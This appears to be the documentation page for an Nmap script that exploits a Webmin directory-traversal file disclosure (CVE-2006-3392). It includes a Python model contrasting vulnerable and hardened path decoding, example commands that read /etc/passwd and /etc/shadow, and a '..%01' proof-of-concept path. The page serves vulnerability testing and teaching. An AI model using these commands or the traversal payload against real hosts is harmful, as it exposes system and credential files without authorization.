Script http-vuln-cve2006-3392
Script types:
portrule
Categories:
exploit, vuln, intrusive
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2006-3392.nse
Script Summary
Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
Webmin before 1.290 and Usermin before 1.220 call the simplify_path function before decoding HTML. This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences to bypass the removal of "../" directory traversal sequences.
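The ordering bug described above (sanitize the raw request path, decode it afterwards) is a general path-handling mistake, so the toy server below models it next to the hardened ordering (decode first, canonicalize against a document root, reject anything that escapes). This is an added example, not code from the Nmap script or from Webmin: the document root, the strip_dotdot cleaner and the control-character clean-up step in the vulnerable path are constructed assumptions that model the behaviour the summary describes, not a transcription of Webmin's miniserv.pl.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the toy server (assumption, not a Webmin path).
DOC_ROOT = "/var/www"

# Matches ASCII control characters such as the \x01 produced by decoding "%01".
CONTROL_CHARS = re.compile(r"[\x00-\x1f]")


def strip_dotdot(path: str) -> str:
    """Toy stand-in for a simplify_path-style cleaner that only removes '../' sequences."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def vulnerable_resolve(request_path: str) -> str:
    """Vulnerable ordering: clean the *encoded* path first, decode afterwards.

    The final control-character strip is a modelling assumption: it stands in for
    whatever later step turns '..\\x01/' into '../' on the real server.
    """
    cleaned = strip_dotdot(request_path)           # "..%01/" is not "../", so nothing is removed
    decoded = unquote(cleaned)                     # "%01" now becomes "\x01"
    decoded = CONTROL_CHARS.sub("", decoded)       # modelled clean-up: "..\x01/" collapses to "../"
    return posixpath.normpath(DOC_ROOT + "/" + decoded.lstrip("/"))


def hardened_resolve(request_path: str) -> Optional[str]:
    """Hardened ordering: decode fully, then canonicalize and check containment in DOC_ROOT.

    Returns the resolved filesystem path, or None when the request must be refused.
    """
    decoded = unquote(request_path)
    # Refuse control characters outright instead of silently dropping them.
    if CONTROL_CHARS.search(decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, decoded.lstrip("/")))
    # Containment check on the canonical form, so '..' segments cannot climb out of the root.
    if candidate != DOC_ROOT and not candidate.startswith(DOC_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: the encoded form from the page, its plain form, and a benign one.
    samples = [
        "/unauthenticated/..%01/..%01/..%01/etc/passwd",
        "/unauthenticated/../../../etc/passwd",
        "/unauthenticated/index.cgi",
    ]
    for req in samples:
        print(f"{req}\n  vulnerable -> {vulnerable_resolve(req)}\n  hardened   -> {hardened_resolve(req)}")
```

The naive cleaner stops the plain "../" form but lets the encoded form through, because it inspects the path before the "%01" bytes exist; the hardened version never trusts the cleaner at all and instead checks the canonical result against the root, which is the property to test for when reviewing any file-serving handler.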
Script Arguments
- http-vuln-cve2006-3392.file
<FILE>. Default: /etc/passwd
- slaxml.debug
See the documentation for the slaxml library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
- vulns.short, vulns.showall
See the documentation for the vulns library.
Example Usage
nmap -sV --script http-vuln-cve2006-3392 <target>
nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>
Script Output
PORT      STATE SERVICE REASON
10000/tcp open  webmin  syn-ack
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|     Description:
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|     Disclosure date: 2006
|     Extra information:
|       Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd
|     References:
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_      http://www.exploit-db.com/exploits/1997/
Requires
Author:
License: Same as Nmap--See https://nmap.org/book/man-legal.html